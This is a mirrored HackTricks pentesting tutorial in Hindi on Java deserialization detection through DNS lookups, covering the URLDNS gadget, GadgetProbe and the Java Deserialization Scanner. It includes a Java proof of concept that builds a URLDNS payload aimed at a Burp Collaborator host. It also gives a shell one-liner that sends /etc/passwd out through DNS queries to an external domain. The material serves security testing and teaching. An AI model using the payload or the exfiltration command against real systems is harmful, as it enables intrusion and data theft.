Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-12-26 04:53:39 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md

17 KiB
Raw Blame History

Java DNS Deserialization, GadgetProbe और Java Deserialization Scanner

Java DNS Deserialization, GadgetProbe और Java Deserialization Scanner

htARTE (HackTricks AWS Red Team Expert) के साथ AWS हैकिंग सीखें

HackTricks का समर्थन करने के अन्य तरीके:

डिसेरियलाइजेशन पर DNS अनुरोध

क्लास java.net.URL Serializable को लागू करता है, इसका मतलब है कि इस क्लास को सीरियलाइज किया जा सकता है।

public final class URL implements java.io.Serializable {

इस क्लास में एक विचित्र व्यवहार होता है। दस्तावेज़ीकरण से: "दो होस्ट्स को समान माना जाता है यदि दोनों होस्ट नामों को एक ही IP पते में हल किया जा सकता है"।
तब, हर बार जब एक URL ऑब्जेक्ट किसी भी equals या hashCode फंक्शन को कॉल करता है, तो IP पता प्राप्त करने के लिए एक DNS अनुरोध भेजा जाएगा।

एक URL ऑब्जेक्ट से hashCode फंक्शन को कॉल करना काफी आसान है, इसे एक HashMap में डालना पर्याप्त है जिसे डीसीरियलाइज़ किया जा रहा है। यह इसलिए है क्योंकि HashMap के readObject फंक्शन के अंत में यह कोड निष्पादित किया जाता है:

private void readObject(java.io.ObjectInputStream s)
throws IOException, ClassNotFoundException {
[   ...   ]
for (int i = 0; i < mappings; i++) {
[   ...   ]
putVal(hash(key), key, value, false, false);
}

यह HashMap के अंदर हर मान के साथ चलाएगा putVal को। लेकिन, ज्यादा महत्वपूर्ण है हर मान के साथ hash को कॉल करना। यह hash फंक्शन का कोड है:

static final int hash(Object key) {
int h;
return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}

जैसा कि आप देख सकते हैं, जब डिसीरियलाइजिंग एक HashMap फंक्शन hash हर ऑब्जेक्ट के साथ निष्पादित होने वाला है और hash निष्पादन के दौरान ऑब्जेक्ट का .hashCode() निष्पादित होगा। इसलिए, अगर आप एक HashMap डिसीरियलाइज करते हैं जिसमें एक URL ऑब्जेक्ट होता है, तो URL ऑब्जेक्ट .hashCode() निष्पादित करेगा

अब, URLObject.hashCode() के कोड पर एक नज़र डालते हैं :

public synchronized int hashCode() {
if (hashCode != -1)
return hashCode;

hashCode = handler.hashCode(this);
return hashCode;

जैसा कि आप देख सकते हैं, जब एक URLObject .hashCode() को निष्पादित करता है, तो इसे hashCode(this) कहा जाता है। आगे आप इस फंक्शन का कोड देख सकते हैं:

protected int hashCode(URL u) {
int h = 0;

// Generate the protocol part.
String protocol = u.getProtocol();
if (protocol != null)
h += protocol.hashCode();

// Generate the host part.
InetAddress addr = getHostAddress(u);
[   ...   ]

आप देख सकते हैं कि डोमेन के लिए getHostAddress का निष्पादन किया जाता है, DNS query लॉन्च करते हुए

इसलिए, इस क्लास का दुरुपयोग किया जा सकता है ताकि DNS query लॉन्च की जा सके यह प्रदर्शित करने के लिए कि deserialization संभव है, या यहां तक कि जानकारी का बाहर निकालना (आप कमांड निष्पादन के आउटपुट को सबडोमेन के रूप में जोड़ सकते हैं)।

URLDNS पेलोड कोड उदाहरण

आप ysoserial से URDNS पेलोड कोड यहाँ पा सकते हैं। हालांकि, इसे कोड करने का तरीका समझने के लिए आसान बनाने के लिए मैंने अपना खुद का PoC बनाया है (ysoserial से प्राप्त एक के आधार पर):

import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.URLConnection;
import java.net.URLStreamHandler;
import java.util.HashMap;
import java.net.URL;

public class URLDNS {
public static void GeneratePayload(Object instance, String file)
throws Exception {
//Serialize the constructed payload and write it to the file
File f = new File(file);
ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
out.writeObject(instance);
out.flush();
out.close();
}
public static void payloadTest(String file) throws Exception {
//Read the written payload and deserialize it
ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
Object obj = in.readObject();
System.out.println(obj);
in.close();
}

public static void main(final String[] args) throws Exception {
String url = "http://3tx71wjbze3ihjqej2tjw7284zapye.burpcollaborator.net";
HashMap ht = new HashMap(); // HashMap that will contain the URL
URLStreamHandler handler = new SilentURLStreamHandler();
URL u = new URL(null, url, handler); // URL to use as the Key
ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.

// During the put above, the URL's hashCode is calculated and cached.
// This resets that so the next time hashCode is called a DNS lookup will be triggered.
final Field field = u.getClass().getDeclaredField("hashCode");
field.setAccessible(true);
field.set(u, -1);

//Test the payloads
GeneratePayload(ht, "C:\\Users\\Public\\payload.serial");
}
}


class SilentURLStreamHandler extends URLStreamHandler {

protected URLConnection openConnection(URL u) throws IOException {
return null;
}

protected synchronized InetAddress getHostAddress(URL u) {
return null;
}
}

अधिक जानकारी

GadgetProbe

आप GadgetProbe को Burp Suite App Store (Extender) से डाउनलोड कर सकते हैं।

GadgetProbe यह पता लगाने की कोशिश करेगा कि कुछ Java classes मौजूद हैं या नहीं सर्वर के Java class पर ताकि आप जान सकें कि यह vulnerable है या नहीं किसी ज्ञात एक्सप्लॉइट के लिए।

यह कैसे काम करता है

GadgetProbe पिछले अनुभाग के समान DNS payload का उपयोग करेगा लेकिन DNS क्वेरी चलाने से पहले यह किसी मनमानी क्लास को डिसीरियलाइज करने की कोशिश करेगा। अगर मनमानी क्लास मौजूद है, तो DNS क्वेरी भेजी जाएगी और GadgetProbe नोट करेगा कि यह क्लास मौजूद है। अगर DNS अनुरोध कभी नहीं भेजा जाता, इसका मतलब है कि मनमानी क्लास को सफलतापूर्वक डिसीरियलाइज नहीं किया गया इसलिए या तो यह मौजूद नहीं है या यह सीरियलाइज़ेबल/एक्सप्लॉइटेबल नहीं है

Github के अंदर, GadgetProbe में कुछ वर्डलिस्ट्स हैं जिनमें Java क्लासेस हैं जिन्हें परीक्षण के लिए रखा गया है।

अधिक जानकारी

Java Deserialization Scanner

इस स्कैनर को Burp App Store (Extender) से डाउनलोड किया जा सकता है।
इस एक्सटेंशन में पैसिव और सक्रिय क्षमताएं हैं।

पैसिव

डिफ़ॉल्ट रूप से यह सभी अनुरोधों और प्रतिक्रियाओं की पैसिव रूप से जांच करता है देख रहा है Java serialized magic bytes के लिए और अगर कोई मिलता है तो एक वल्नरेबिलिटी चेतावनी प्रस्तुत करेगा:

सक्रिय

मैनुअल परीक्षण

आप एक अनुरोध का चयन कर सकते हैं, राइट क्लिक करें और Send request to DS - Manual Testing
फिर, Deserialization Scanner Tab --> Manual testing tab के अंदर आप insertion point का चयन कर सकते हैं। और परीक्षण शुरू करें (उपयोग की जा रही एन्कोडिंग के आधार पर उपयुक्त अटैक का चयन करें)।

भले ही इसे "मैनुअल परीक्षण" कहा जाता है, यह काफी स्वचालित है। यह स्वचालित रूप से जांच करेगा कि डिसीरियलाइजेशन vulnerable है या नहीं किसी ysoserial payload के लिए वेब सर्वर पर मौजूद लाइब्रेरीज की जांच करके और वल्नरेबल वालों को हाइलाइट करेगा। वल्नरेबल लाइब्रेरीज की जांच करने के लिए आप Java Sleeps, sleeps के माध्यम से CPU की खपत, या DNS का उपयोग करके लॉन्च करने का चयन कर सकते हैं जैसा कि पहले उल्लेख किया गया है।

एक्सप्लॉइटिंग

एक बार जब आपने एक वल्नरेबल लाइब्रेरी की पहचान कर ली है तो आप अनुरोध को Exploiting Tab में भेज सकते हैं।
इस टैब में आपको फिर से injection point का चयन करना होगा, और वल्नरेबल लाइब्रेरी लिखनी होगी जिसके लिए आप पेलोड बनाना चाहते हैं, और कमांड। फिर, उपयुक्त Attack बटन दबाएं।

Java Deserialization DNS Exfil जानकारी

अपने पेलोड को निम्नलिखित कुछ करने के लिए निष्पादित करें:

(i=0;tar zcf - /etc/passwd | xxd -p -c 31 | while read line; do host $line.$i.cl1k22spvdzcxdenxt5onx5id9je73.burpcollaborator.net;i=$((i+1)); done)

अधिक जानकारी

AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके: